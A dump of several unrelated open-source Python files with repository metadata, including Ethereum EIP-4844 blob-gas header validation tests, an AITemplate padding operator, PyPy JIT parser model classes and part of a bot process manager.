os.chdir(Path(bundle.config_directory).parent)
agent_class_wrapper = import_agent(python_file)
config_file = agent_class_wrapper.get_loaded_class().base_create_agent_configurations()
config_file.parse_file(bundle.config_obj, config_directory=bundle.config_directory)
if hasattr(agent_class_wrapper.get_loaded_class(), "run_independently"):
bm = BotManagerIndependent(terminate_event, callback_event, reload_request, config_file, name, team, index,
agent_class_wrapper, agent_telemetry_queue, match_config, matchcomms_root,
spawn_id)
else:
bm = BotManagerStruct(terminate_event, callback_event, reload_request, config_file, name, team, index,
agent_class_wrapper, agent_telemetry_queue, match_config, matchcomms_root, spawn_id)
bm.run()
def kill_bot_processes(self):
for process_info in self.bot_processes.values():
proc = process_info.process or process_info.subprocess
proc.terminate()
for process_info in self.bot_processes.values():
if process_info.process:
process_info.process.join(timeout=1)
self.bot_processes.clear()
self.num_metadata_received = 0
def send_sigterm_recursive(self, pid: int) -> List[psutil.Process]:
"""
Returns the list of processes under the pid and including the pid for further handling,
because they may become orphaned by the sigterm.
"""
all_processes = []
immediate_children = []
try:
process = psutil.Process(pid)
immediate_children = [c for c in process.children(recursive=False)]
all_processes = [process] + [c for c in process.children(recursive=True)]
process.send_signal(signal.SIGTERM)
except Exception as ex:
self.logger.debug(f"Got {ex} while sending sigterm to pid {pid}.")
for c in immediate_children:
self.send_sigterm_recursive(c.pid)
return all_processes
def kill_agent_process_ids(self, pids: Set[int]):
all_processes = []
for pid in pids:
all_processes += self.send_sigterm_recursive(pid)
time.sleep(.5)
for c in all_processes:
try:
c.kill()
except Exception as ex:
self.logger.debug(f"Got {ex} while killing pid {pid}.")
def kill_matchcomms_server(self):
if self.matchcomms_server:
self.matchcomms_server.close()
self.matchcomms_server = None
def try_get_steam_executable_path() -> Optional[Path]:
"""
Tries to find the path of the Steam executable.
Has platform specific code.
"""
try:
from winreg import OpenKey, HKEY_CURRENT_USER, ConnectRegistry, QueryValueEx, REG_SZ
    except ImportError:
return # TODO: Linux support.
try:
key = OpenKey(ConnectRegistry(None, HKEY_CURRENT_USER), r'Software\Valve\Steam')
val, val_type = QueryValueEx(key, 'SteamExe')
except FileNotFoundError:
return
if val_type != REG_SZ:
return
return Path(val)
|
f03da7b9011f1f33e586be12be9b17a22e41fd29
|
f86035685ad272d5504ec4f5715feed428a89637
|
/src/EIPTestsFiller/Pyspecs/cancun/eip4844_blobs/test_excess_blob_gas.py
|
032ddb639fdb2520168c72758ab7c5c061ae1fcc
|
[
"MIT"
] |
permissive
|
ethereum/tests
|
fd0206671a652e1550b1f64b1b34df191570ae7a
|
9b00b68593f5869eb51a6659e1cc983e875e616b
|
refs/heads/develop
| 2023-08-30T14:33:54.326595
| 2023-08-18T00:00:33
| 2023-08-19T13:03:12
| 15,540,967
| 507
| 338
|
MIT
| 2023-09-14T02:12:16
| 2013-12-31T02:09:03
|
Python
|
UTF-8
|
Python
| false
| false
| 22,487
|
py
|
test_excess_blob_gas.py
|
"""
abstract: Tests `excessBlobGas` and `blobGasUsed` block fields for [EIP-4844: Shard Blob Transactions](https://eips.ethereum.org/EIPS/eip-4844)
Test `excessBlobGas` and `blobGasUsed` block fields for [EIP-4844: Shard Blob Transactions](https://eips.ethereum.org/EIPS/eip-4844).
note: Adding a new test
Add a function that is named `test_<test_name>` and takes at least the following arguments:
- blockchain_test
- env
- pre
- blocks
- post
- correct_excess_blob_gas
The following arguments *need* to be parametrized or the test will not be generated:
- new_blobs
All other `pytest.fixture` fixtures can be parametrized to generate new combinations and test
cases.
""" # noqa: E501
import itertools
from typing import Iterator, List, Mapping, Optional, Tuple
import pytest
from ethereum_test_tools import (
Account,
Block,
BlockchainTestFiller,
Environment,
Header,
TestAddress,
TestAddress2,
Transaction,
add_kzg_version,
to_address,
to_hash_bytes,
)
from .spec import Spec, SpecHelpers, ref_spec_4844
REFERENCE_SPEC_GIT_PATH = ref_spec_4844.git_path
REFERENCE_SPEC_VERSION = ref_spec_4844.version
# All tests run from Cancun fork
pytestmark = pytest.mark.valid_from("Cancun")
@pytest.fixture
def parent_excess_blobs() -> int: # noqa: D103
"""
By default we start with an intermediate value between the target and max.
"""
return (SpecHelpers.max_blobs_per_block() + SpecHelpers.target_blobs_per_block()) // 2 + 1
@pytest.fixture
def parent_excess_blob_gas(parent_excess_blobs: int) -> int: # noqa: D103
return parent_excess_blobs * Spec.GAS_PER_BLOB
@pytest.fixture
def correct_excess_blob_gas( # noqa: D103
parent_excess_blob_gas: int,
parent_blobs: int,
) -> int:
return SpecHelpers.calc_excess_blob_gas_from_blob_count(
parent_excess_blob_gas=parent_excess_blob_gas,
parent_blob_count=parent_blobs,
)
@pytest.fixture
def header_excess_blobs_delta() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def header_excess_blob_gas_delta() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def header_excess_blob_gas( # noqa: D103
correct_excess_blob_gas: int,
header_excess_blobs_delta: Optional[int],
header_excess_blob_gas_delta: Optional[int],
) -> Optional[int]:
if header_excess_blobs_delta is not None:
modified_excess_blob_gas = correct_excess_blob_gas + (
header_excess_blobs_delta * Spec.GAS_PER_BLOB
)
if modified_excess_blob_gas < 0:
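            # Wrap negative values into their two's-complement uint64 representation.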
            modified_excess_blob_gas = 2**64 + modified_excess_blob_gas
return modified_excess_blob_gas
if header_excess_blob_gas_delta is not None:
return correct_excess_blob_gas + header_excess_blob_gas_delta
return None
@pytest.fixture
def block_fee_per_blob_gas( # noqa: D103
correct_excess_blob_gas: int,
) -> int:
return Spec.get_blob_gasprice(excess_blob_gas=correct_excess_blob_gas)
@pytest.fixture
def block_base_fee() -> int: # noqa: D103
return 7
@pytest.fixture
def env( # noqa: D103
parent_excess_blob_gas: int,
block_base_fee: int,
parent_blobs: int,
) -> Environment:
return Environment(
excess_blob_gas=parent_excess_blob_gas
if parent_blobs == 0
else parent_excess_blob_gas + Spec.TARGET_BLOB_GAS_PER_BLOCK,
base_fee=block_base_fee,
)
@pytest.fixture
def tx_max_fee_per_gas( # noqa: D103
block_base_fee: int,
) -> int:
return block_base_fee
@pytest.fixture
def tx_max_fee_per_blob_gas( # noqa: D103
block_fee_per_blob_gas: int,
) -> int:
return block_fee_per_blob_gas
@pytest.fixture
def tx_data_cost( # noqa: D103
tx_max_fee_per_blob_gas: int,
new_blobs: int,
) -> int:
return tx_max_fee_per_blob_gas * Spec.GAS_PER_BLOB * new_blobs
@pytest.fixture
def tx_value() -> int: # noqa: D103
return 1
@pytest.fixture
def tx_exact_cost(tx_value: int, tx_max_fee_per_gas: int, tx_data_cost: int) -> int: # noqa: D103
tx_gas = 21000
return (tx_gas * tx_max_fee_per_gas) + tx_value + tx_data_cost
@pytest.fixture
def pre(tx_exact_cost: int) -> Mapping[str, Account]: # noqa: D103
return {
TestAddress: Account(balance=tx_exact_cost),
TestAddress2: Account(balance=10**40),
}
@pytest.fixture
def destination_account() -> str: # noqa: D103
return to_address(0x100)
@pytest.fixture
def post(destination_account: str, tx_value: int) -> Mapping[str, Account]: # noqa: D103
return {
destination_account: Account(balance=tx_value),
}
@pytest.fixture
def tx( # noqa: D103
new_blobs: int,
tx_max_fee_per_gas: int,
tx_max_fee_per_blob_gas: int,
destination_account: str,
):
if new_blobs == 0:
# Send a normal type two tx instead
return Transaction(
ty=2,
nonce=0,
to=destination_account,
value=1,
gas_limit=21000,
max_fee_per_gas=tx_max_fee_per_gas,
max_priority_fee_per_gas=0,
access_list=[],
)
else:
return Transaction(
ty=Spec.BLOB_TX_TYPE,
nonce=0,
to=destination_account,
value=1,
gas_limit=21000,
max_fee_per_gas=tx_max_fee_per_gas,
max_priority_fee_per_gas=0,
max_fee_per_blob_gas=tx_max_fee_per_blob_gas,
access_list=[],
blob_versioned_hashes=add_kzg_version(
[to_hash_bytes(x) for x in range(new_blobs)],
Spec.BLOB_COMMITMENT_VERSION_KZG,
),
)
@pytest.fixture
def header_blob_gas_used() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def blocks( # noqa: D103
tx: Transaction,
header_excess_blob_gas: Optional[int],
header_blob_gas_used: Optional[int],
non_zero_blob_gas_used_genesis_block: Block,
):
blocks = (
[]
if non_zero_blob_gas_used_genesis_block is None
else [non_zero_blob_gas_used_genesis_block]
)
if header_excess_blob_gas is not None:
blocks.append(
Block(
txs=[tx],
rlp_modifier=Header(
excess_blob_gas=header_excess_blob_gas,
),
exception="invalid excess blob gas",
),
)
elif header_blob_gas_used is not None:
blocks.append(
Block(
txs=[tx],
rlp_modifier=Header(
blob_gas_used=header_blob_gas_used,
),
exception="invalid blob gas used",
),
)
else:
blocks.append(Block(txs=[tx]))
return blocks
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.max_blobs_per_block() + 1))
@pytest.mark.parametrize("parent_excess_blobs", range(0, SpecHelpers.target_blobs_per_block() + 1))
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_excess_blob_gas_calculation(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` increase/decrease across
multiple blocks with and without blobs:
- With parent block containing `[0, MAX_BLOBS_PER_BLOCK]` blobs
- With parent block containing `[0, TARGET_BLOBS_PER_BLOCK]` equivalent value of excess blob gas
""" # noqa: E501
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
BLOB_GAS_COST_INCREASES = [
SpecHelpers.get_min_excess_blobs_for_blob_gas_price(i)
for i in [
2, # First blob gas cost increase
2**32 // Spec.GAS_PER_BLOB, # Data tx wei cost 2^32
2**32, # blob gas cost 2^32
2**64 // Spec.GAS_PER_BLOB, # Data tx wei cost 2^64
2**64, # blob gas cost 2^64
(
120_000_000 * (10**18) // Spec.GAS_PER_BLOB
), # Data tx wei is current total Ether supply
]
]
@pytest.mark.parametrize(
"parent_excess_blobs",
[g - 1 for g in BLOB_GAS_COST_INCREASES],
)
@pytest.mark.parametrize("parent_blobs", [SpecHelpers.target_blobs_per_block() + 1])
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_increasing_blob_gas_costs(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` and blob gas tx costs at
value points where the cost increases to interesting amounts:
- At the first blob gas cost increase (1 to 2)
- At total transaction data cost increase to `> 2^32`
- At blob gas wei cost increase to `> 2^32`
- At total transaction data cost increase to `> 2^64`
- At blob gas wei cost increase to `> 2^64`
- At blob gas wei cost increase of around current total Ether supply
"""
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
@pytest.mark.parametrize(
"parent_excess_blobs",
[g for g in BLOB_GAS_COST_INCREASES],
)
@pytest.mark.parametrize("parent_blobs", [SpecHelpers.target_blobs_per_block() - 1])
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_decreasing_blob_gas_costs(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` and blob gas tx costs at
value points where the cost decreases to interesting amounts.
See test_correct_increasing_blob_gas_costs.
"""
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
@pytest.mark.parametrize("header_excess_blob_gas", [0])
@pytest.mark.parametrize("new_blobs", [0, 1])
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.max_blobs_per_block() + 1))
def test_invalid_zero_excess_blob_gas_in_header(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` in the header drops to
zero in a block with or without data blobs, but the excess blobs in the parent are
greater than target.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
def all_invalid_blob_gas_used_combinations() -> Iterator[Tuple[int, int]]:
"""
Returns all invalid blob gas used combinations.
"""
for new_blobs in range(0, SpecHelpers.max_blobs_per_block() + 1):
for header_blob_gas_used in range(0, SpecHelpers.max_blobs_per_block() + 1):
if new_blobs != header_blob_gas_used:
yield (new_blobs, header_blob_gas_used * Spec.GAS_PER_BLOB)
yield (new_blobs, 2**64 - 1)
@pytest.mark.parametrize(
"new_blobs,header_blob_gas_used",
all_invalid_blob_gas_used_combinations(),
)
@pytest.mark.parametrize("parent_blobs", [0])
def test_invalid_blob_gas_used_in_header(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
new_blobs: int,
header_blob_gas_used: Optional[int],
):
"""
Test rejection of blocks where the `blobGasUsed` in the header is invalid:
- `blobGasUsed` is not equal to the number of data blobs in the block
- `blobGasUsed` is the max uint64 value
"""
if header_blob_gas_used is None:
raise Exception("test case is badly formatted")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(new_blobs *Spec.GAS_PER_BLOB)}",
f"header:{hex(header_blob_gas_used)}",
]
),
)
@pytest.mark.parametrize(
"header_excess_blobs_delta,parent_blobs",
[
(-1, 0),
(+1, SpecHelpers.max_blobs_per_block()),
],
ids=["zero_blobs_decrease_more_than_expected", "max_blobs_increase_more_than_expected"],
)
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_above_target_change(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas`
- decreases more than `TARGET_BLOB_GAS_PER_BLOCK` in a single block with zero blobs
- increases more than `TARGET_BLOB_GAS_PER_BLOCK` in a single block with max blobs
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs",
[
b
for b in range(0, SpecHelpers.max_blobs_per_block() + 1)
if b != SpecHelpers.target_blobs_per_block()
],
)
@pytest.mark.parametrize("parent_excess_blobs", [1, SpecHelpers.target_blobs_per_block()])
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_static_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
parent_excess_blob_gas: int,
):
"""
Test rejection of blocks where the `excessBlobGas` remains unchanged
but the parent blobs included are not `TARGET_BLOBS_PER_BLOCK`.
Test is parametrized to `MAX_BLOBS_PER_BLOCK` and `TARGET_BLOBS_PER_BLOCK`.
"""
blocks[-1].rlp_modifier = Header(excess_blob_gas=parent_excess_blob_gas)
blocks[-1].exception = "invalid excessBlobGas"
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(parent_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize("header_excess_blobs_delta", range(1, SpecHelpers.max_blobs_per_block()))
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.target_blobs_per_block() + 1))
@pytest.mark.parametrize("parent_excess_blobs", [0]) # Start at 0
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_target_blobs_increase_from_zero(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` increases from zero,
even when the included blobs are on or below target.
    Test is parametrized according to `[0, TARGET_BLOBS_PER_BLOCK]` new blobs.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize("header_excess_blob_gas", [0])
@pytest.mark.parametrize(
"parent_blobs",
range(SpecHelpers.target_blobs_per_block() + 1, SpecHelpers.max_blobs_per_block() + 1),
)
@pytest.mark.parametrize("parent_excess_blobs", [0]) # Start at 0
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_static_excess_blob_gas_from_zero_on_blobs_above_target(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` does not increase from
    zero, even when the included blob count is above target.
Test is parametrized to `[TARGET_BLOBS_PER_BLOCK+1, MAX_BLOBS_PER_BLOCK]` new blobs.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs,header_excess_blobs_delta",
itertools.product(
# parent_blobs
range(0, SpecHelpers.max_blobs_per_block() + 1),
# header_excess_blobs_delta (from correct value)
[
x
for x in range(
-SpecHelpers.target_blobs_per_block(), SpecHelpers.target_blobs_per_block() + 1
)
if x != 0
],
),
)
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_change(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to an invalid
value.
Given a parent block containing `[0, MAX_BLOBS_PER_BLOCK]` blobs, test an invalid
`excessBlobGas` value by changing it by `[-TARGET_BLOBS_PER_BLOCK, TARGET_BLOBS_PER_BLOCK]`
from the correct value.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"header_excess_blob_gas",
[(2**64 + (x * Spec.GAS_PER_BLOB)) for x in range(-SpecHelpers.target_blobs_per_block(), 0)],
)
@pytest.mark.parametrize("parent_blobs", range(SpecHelpers.target_blobs_per_block()))
@pytest.mark.parametrize("new_blobs", [1])
@pytest.mark.parametrize("parent_excess_blobs", range(SpecHelpers.target_blobs_per_block()))
def test_invalid_negative_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to the two's
complement equivalent of the negative value after subtracting target blobs.
Reasoning is that the `excessBlobGas` is a `uint64`, so it cannot be negative, and
we test for a potential underflow here.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs,header_excess_blob_gas_delta",
[
(SpecHelpers.target_blobs_per_block() + 1, 1),
(SpecHelpers.target_blobs_per_block() + 1, Spec.GAS_PER_BLOB - 1),
(SpecHelpers.target_blobs_per_block() - 1, -1),
(SpecHelpers.target_blobs_per_block() - 1, -(Spec.GAS_PER_BLOB - 1)),
],
)
@pytest.mark.parametrize("new_blobs", [1])
@pytest.mark.parametrize("parent_excess_blobs", [SpecHelpers.target_blobs_per_block() + 1])
def test_invalid_non_multiple_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to a value that
    is not a multiple of `Spec.GAS_PER_BLOB`:
    - Parent block contains `TARGET_BLOBS_PER_BLOCK + 1` blobs, but `excessBlobGas` is off by `+1` or `+(GAS_PER_BLOB - 1)`
    - Parent block contains `TARGET_BLOBS_PER_BLOCK - 1` blobs, but `excessBlobGas` is off by `-1` or `-(GAS_PER_BLOB - 1)`
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
|
6103daeb5f15af6f876a104244920f44e91607f5
|
8d77f3b72dc52b85ee0c4ef6ba06f63a6920841f
|
/python/aitemplate/compiler/ops/padding/pad_last_dim.py
|
6def61e730b03e73241b86ae1814ec702bdfa2c2
|
[
"Apache-2.0"
] |
permissive
|
facebookincubator/AITemplate
|
b643c217e1d15f7f17dab1eb1cc6855eab664b97
|
c60dc19788217556ba12ea378c02b9fd0aea9ffe
|
refs/heads/main
| 2023-08-28T18:22:15.828008
| 2023-08-28T14:43:41
| 2023-08-28T14:43:41
| 514,321,895
| 4,065
| 334
|
Apache-2.0
| 2023-09-14T04:53:57
| 2022-07-15T15:40:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
pad_last_dim.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Pad last dimension.
"""
import jinja2
from aitemplate import backend
from aitemplate.backend import registry
from aitemplate.compiler.base import IntImm, Operator, Tensor
# pylint: disable=C0103,W0221
SHAPE_FUNC_TEMPLATE = jinja2.Template(
"""
{% for dim in shape %}
{{indent}}{{dtype}}X_DIM{{loop.index - 1}} = {{dim}};
{% endfor %}
{{indent}}{{dtype}}Y_OUT_DIM = {{out_dim}};
"""
)
SHAPE_ASSIGNMENT_TEMPLATE = jinja2.Template(
"""
{% for dim in shape %}
{{indent}}{{dtype}}{{dim}} = X_DIM{{loop.index - 1}};
{% endfor %}
{{indent}}{{dtype}}{{last_dim}} = Y_OUT_DIM;
"""
)
class pad_last_dim(Operator):
"""Pad the last dimension of the input data to the specified length."""
def __init__(self, ndim: int, out_dim: int):
super().__init__()
self._attrs["op"] = "pad_last_dim"
self._attrs["ndim"] = ndim
self._attrs["out_dim"] = out_dim
self.shape_eval_template = SHAPE_FUNC_TEMPLATE
self.shape_save_template = SHAPE_ASSIGNMENT_TEMPLATE
def _infer_shapes(self, x: Tensor):
"""Infers shapes for pad_last_dim."""
x_shape = x._attrs["shape"]
ndim = len(x_shape)
if self._attrs["out_dim"] <= max(x_shape[-1]._attrs["values"]):
raise RuntimeError("Output of padded dim must be larger than original dim")
if ndim != self._attrs["ndim"]:
raise RuntimeError("Data/Op dims mismatch")
if ndim > 4:
raise NotImplementedError
output_shape = list(x_shape)
output_shape[-1] = IntImm(self._attrs["out_dim"])
return output_shape
    def __call__(self, x: Tensor) -> Tensor:
self._attrs["inputs"] = [x]
self._set_depth()
output_shape = self._infer_shapes(x)
output = Tensor(output_shape, src_ops={self}, dtype=x._attrs["dtype"])
self._attrs["outputs"] = [output]
return output
def _get_op_attributes(self):
return {"ndim": self._attrs["ndim"], "out_dim": self._attrs["out_dim"]}
def gen_function(self) -> str:
target = backend.target.Target.current()
template_path = target.template_path()
func_key = "{target}.{op}.gen_function".format(
target=target.name(), op=self._attrs["op"]
)
func = registry.get(func_key)
return func(
self._attrs,
template_path,
self.shape_eval_template,
self.shape_save_template,
)
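# A NumPy reference sketch of the op's semantics (assumption: zeros are
# appended along the last axis, consistent with the shape inference above;
# this is not AITemplate's backend implementation).
import numpy as np

def _pad_last_dim_ref(x: "np.ndarray", out_dim: int) -> "np.ndarray":
    pad = out_dim - x.shape[-1]
    assert pad > 0, "out_dim must be larger than the original last dim"
    return np.pad(x, [(0, 0)] * (x.ndim - 1) + [(0, pad)])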
|
0a4f2cd3137e87ec639951780c25585fc21f5d3d
|
704976ea552111c6a5af9cd7cb62b9d9abaf3996
|
/rpython/jit/tool/oparser_model.py
|
a52d879f419656b801c11258ca3505ab9c51dec3
|
[
"BSD-3-Clause"
] |
permissive
|
mesalock-linux/mesapy
|
4f02c5819ce7f2f6e249d34840f1aa097577645d
|
ed546d59a21b36feb93e2309d5c6b75aa0ad95c9
|
refs/heads/mesapy2.7
| 2023-08-16T21:33:02.239581
| 2019-08-13T10:29:43
| 2019-08-13T18:06:45
| 136,080,721
| 396
| 33
|
NOASSERTION
| 2020-04-01T03:05:18
| 2018-06-04T20:45:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,846
|
py
|
oparser_model.py
|
class Boxes(object):
pass
def get_real_model():
class LoopModel(object):
from rpython.jit.metainterp.history import TreeLoop, JitCellToken
from rpython.jit.metainterp.history import ConstInt, ConstPtr, ConstFloat
from rpython.jit.metainterp.history import BasicFailDescr, BasicFinalDescr, TargetToken
from rpython.jit.metainterp.typesystem import llhelper
from rpython.jit.metainterp.opencoder import Trace
from rpython.jit.metainterp.history import get_const_ptr_for_string
from rpython.jit.metainterp.history import get_const_ptr_for_unicode
get_const_ptr_for_string = staticmethod(get_const_ptr_for_string)
get_const_ptr_for_unicode = staticmethod(get_const_ptr_for_unicode)
@staticmethod
def convert_to_floatstorage(arg):
from rpython.jit.codewriter import longlong
return longlong.getfloatstorage(float(arg))
@staticmethod
def ptr_to_int(obj):
from rpython.jit.codewriter.heaptracker import adr2int
from rpython.rtyper.lltypesystem import llmemory
return adr2int(llmemory.cast_ptr_to_adr(obj))
return LoopModel
def get_mock_model():
class MockLoopModel(object):
class TreeLoop(object):
def __init__(self, name):
self.name = name
class JitCellToken(object):
I_am_a_descr = True
class TargetToken(object):
def __init__(self, jct):
pass
class BasicFailDescr(object):
I_am_a_descr = True
final_descr = False
class BasicFinalDescr(object):
I_am_a_descr = True
final_descr = True
class Box(object):
_counter = 0
type = 'b'
def __init__(self, value=0):
self.value = value
def __repr__(self):
result = str(self)
result += '(%s)' % self.value
return result
def __str__(self):
if not hasattr(self, '_str'):
self._str = '%s%d' % (self.type, Box._counter)
Box._counter += 1
return self._str
class BoxInt(Box):
type = 'i'
class BoxFloat(Box):
type = 'f'
class BoxRef(Box):
type = 'p'
class BoxVector(Box):
type = 'V'
class Const(object):
bytesize = 8
signed = True
def __init__(self, value=None):
self.value = value
def _get_str(self):
return str(self.value)
def is_constant(self):
return True
class ConstInt(Const):
datatype = 'i'
pass
class ConstPtr(Const):
datatype = 'r'
pass
class ConstFloat(Const):
datatype = 'f'
signed = False
pass
@classmethod
def get_const_ptr_for_string(cls, s):
return cls.ConstPtr(s)
@classmethod
def get_const_ptr_for_unicode(cls, s):
return cls.ConstPtr(s)
@staticmethod
def convert_to_floatstorage(arg):
return float(arg)
@staticmethod
def ptr_to_int(obj):
return id(obj)
class llhelper(object):
pass
MockLoopModel.llhelper.BoxRef = MockLoopModel.BoxRef
return MockLoopModel
def get_model(use_mock):
if use_mock:
model = get_mock_model()
else:
model = get_real_model()
class ExtendedTreeLoop(model.TreeLoop):
def as_json(self):
return {
'comment': self.comment,
'name': self.name,
'operations': [op.as_json() for op in self.operations],
'inputargs': self.inputargs,
'last_offset': self.last_offset
}
def getboxes(self):
def opboxes(operations):
for op in operations:
yield op.result
for box in op.getarglist():
yield box
def allboxes():
for box in self.inputargs:
yield box
for box in opboxes(self.operations):
yield box
boxes = Boxes()
for box in allboxes():
if isinstance(box, model.Box):
name = str(box)
setattr(boxes, name, box)
return boxes
def setvalues(self, **kwds):
boxes = self.getboxes()
for name, value in kwds.iteritems():
getattr(boxes, name).value = value
model.ExtendedTreeLoop = ExtendedTreeLoop
return model
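# A hedged usage sketch (assumes the mock path of this module): build the mock
# model and collect the auto-named boxes of a hand-rolled loop.
def _example_mock_usage():
    model = get_model(use_mock=True)
    loop = model.ExtendedTreeLoop("example")
    loop.inputargs = [model.BoxInt(1), model.BoxFloat(2.0)]
    loop.operations = []
    return loop.getboxes()   # attributes named '<type><counter>', e.g. i0, f1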
|
ce618000e59756a77fff313c6dabf22f2e5c46f0
|
dd317f56cd0d93b66e174e93691dd09d4e191d30
|
/tests/test_03_multiple_dependency.py
|
a5e585a9faf2bc1396a48b59eef52c7a1ca6cfb8
|
[
"Apache-2.0"
] |
permissive
|
